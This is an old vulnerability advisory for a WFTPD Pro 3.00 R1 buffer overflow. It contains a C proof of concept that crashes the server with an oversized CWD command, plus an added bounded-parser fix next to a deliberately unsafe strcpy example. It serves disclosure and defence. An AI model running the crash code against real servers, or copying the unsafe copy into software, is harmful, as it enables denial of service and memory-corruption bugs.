Date: Sat, 3 Mar 2001 18:51:52 -0000
From: [email protected]
To: [email protected]
Subject: WFTPD Pro 3.00 R1 Buffer Overflow
When sending a command (cwd) followed by a long argument (~500 char '.') the server crashes with:
Anwendungspopup: WFTPD Service Control: WFTPD.EXE - Fehler in Anwendung:
Die Anweisung in "0x2e2e2e2e" verweist auf Speicher in "0x2e2e2e2e".
Der Vorgang "read" konnte nicht auf dem Speicher durchgeführt werden.
which means in English: Exception fault at: 0x2e2e2e2e, reading from 0x2e2e2e2e is not possible...
Executing arbitrary code is possible
The author has been contacted
----------------------
[email protected] or
[email protected]
Tested on win2k using trial version of WFTPD 3.00 R1
Simple exploit:
//WFTPD Pro 3.00 R1 Buffer Overflow exploit
//written by [email protected]
// Logs in with USER/PASS, then sends "CWD " followed by a long run of '.';
// the server faults reading from 0x2e2e2e2e ('.' is 0x2e).
// Link against wsock32.lib (Winsock 1.1).
#include <stdio.h>
#include <string.h>
#include <winsock.h>
#include <windows.h>

int main(void){
    SOCKET sock_victim;
    WORD version=MAKEWORD(1,1);
    WSADATA wsadata;
    SOCKADDR_IN victim;
    char buffer[1024];
    char exploitbuffer[800]={"CWD "};   // remainder of the array is zero-filled
    char recvbuffer[1024];

    if(WSAStartup(version, &wsadata)!=0) return 1;
    sock_victim=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sock_victim==INVALID_SOCKET){ WSACleanup(); return 1; }

    memset(&victim, 0, sizeof(victim));
    victim.sin_family=AF_INET;
    victim.sin_addr.s_addr=inet_addr("10.17.3.44");   // test host used in the report
    victim.sin_port=htons(21);
    if(connect(sock_victim, (struct sockaddr*)&victim, sizeof(victim))==SOCKET_ERROR){
        closesocket(sock_victim); WSACleanup(); return 1;
    }

    // read the banner, then log in
    recv(sock_victim, recvbuffer, sizeof(recvbuffer),0);
    memset(recvbuffer, '\0', sizeof(recvbuffer));   // '\0' (NUL), not the multi-char constant '/0'
    send(sock_victim, "USER test\r\n", strlen("USER test\r\n"),0);
    recv(sock_victim, recvbuffer, sizeof(recvbuffer),0);
    memset(recvbuffer, '\0', sizeof(recvbuffer));
    send(sock_victim, "PASS\r\n", strlen("PASS\r\n"),0);
    recv(sock_victim, recvbuffer, sizeof(recvbuffer),0);
    memset(recvbuffer, '\0', sizeof(recvbuffer));

    // "CWD " + 795 x '.'; leave the last byte as the terminating NUL
    memset(exploitbuffer+4, '.', sizeof(exploitbuffer)-5);
    sprintf(buffer, "%s\r\n", exploitbuffer);
    // send the string only, not the whole 1024-byte buffer
    send(sock_victim, buffer, strlen(buffer),0);
    recv(sock_victim, recvbuffer, sizeof(recvbuffer),0);

    // only the socket handle is closed (connect() returns a status, not a socket)
    closesocket(sock_victim);
    WSACleanup();
    return 0;
}
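The fault address in the report is the argument bytes themselves ('.' is 0x2e), which is what an unchecked copy of the CWD argument into a fixed stack buffer produces. The following is an added example, not code from the advisory or from WFTPD: a bounded FTP command-line parser that rejects an oversized argument before any copy, shown beside the unbounded pattern the symptom is consistent with. The function names, the 255-byte argument cap and the reply codes are assumptions; the 500-dot trigger line is constructed inline.

```c
/* Added example, not part of the original advisory or of WFTPD.
 * Names, the MAX_ARG limit and the reply codes are assumptions. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define MAX_VERB 4      /* FTP verbs are at most four letters */
#define MAX_ARG  255    /* assumed server-side cap on one argument */

typedef struct {
    char verb[MAX_VERB + 1];
    char arg[MAX_ARG + 1];
} ftp_cmd_t;

/* The pattern that yields exactly the reported symptom: the argument is
 * copied into a fixed stack buffer with no length check, so ~500 bytes of
 * '.' run past it and the saved return address becomes 0x2e2e2e2e.
 * Kept for contrast only; it is never called. */
void unsafe_cwd(const char *arg)
{
    char path[256];
    strcpy(path, arg);
    (void)path;
}

/* A return address overwritten by a run of one byte: four '.' (0x2e)
 * give the 0x2e2e2e2e shown in the fault dialog. */
static unsigned int fill_word(unsigned char b)
{
    return ((unsigned int)b << 24) | ((unsigned int)b << 16) |
           ((unsigned int)b << 8) | (unsigned int)b;
}

/* Parses one command line (CRLF optional). Returns 0 on success, 500 for a
 * missing or malformed verb, 501 when the argument exceeds MAX_ARG. The
 * length check happens before the copy, which is the fix for this bug class. */
static int parse_ftp_command(const char *line, ftp_cmd_t *out)
{
    size_t i = 0, n;

    memset(out, 0, sizeof *out);
    while (i < MAX_VERB && isalpha((unsigned char)line[i])) {
        out->verb[i] = (char)toupper((unsigned char)line[i]);
        i++;
    }
    /* verb must be 1..4 letters and be followed by a separator or end */
    if (i == 0 || (line[i] != ' ' && line[i] != '\r' &&
                   line[i] != '\n' && line[i] != '\0'))
        return 500;
    if (line[i] == ' ')
        i++;
    n = strcspn(line + i, "\r\n");      /* argument runs to CR/LF or end */
    if (n > MAX_ARG)
        return 501;                     /* reject; nothing is copied */
    memcpy(out->arg, line + i, n);
    out->arg[n] = '\0';
    return 0;
}

/* Reply code alone, for callers that only need accept/reject. */
static int reply_code(const char *line)
{
    ftp_cmd_t c;
    return parse_ftp_command(line, &c);
}

/* 1 if 'line' parses to the expected verb and argument, else 0. */
static int parses_to(const char *line, const char *verb, const char *arg)
{
    ftp_cmd_t c;
    if (parse_ftp_command(line, &c) != 0)
        return 0;
    return strcmp(c.verb, verb) == 0 && strcmp(c.arg, arg) == 0;
}

/* Constructed trigger from the report: "CWD " + 500 '.' + CRLF.
 * Returns the reply the bounded parser gives it. */
static int long_cwd_reply(void)
{
    char line[4 + 500 + 3];
    memcpy(line, "CWD ", 4);
    memset(line + 4, '.', 500);
    memcpy(line + 504, "\r\n", 3);      /* copies the NUL as well */
    return reply_code(line);
}

int main(void)
{
    printf("CWD + 500 dots -> reply %d\n", long_cwd_reply());
    printf("fault address from a '.' fill: 0x%08x\n", fill_word('.'));
    return 0;
}
```

A server that parses this way answers the oversized CWD with a 5xx reply and keeps running; the same length gate is also the obvious place to log the event, since a legitimate client has no reason to send a 500-byte path of dots.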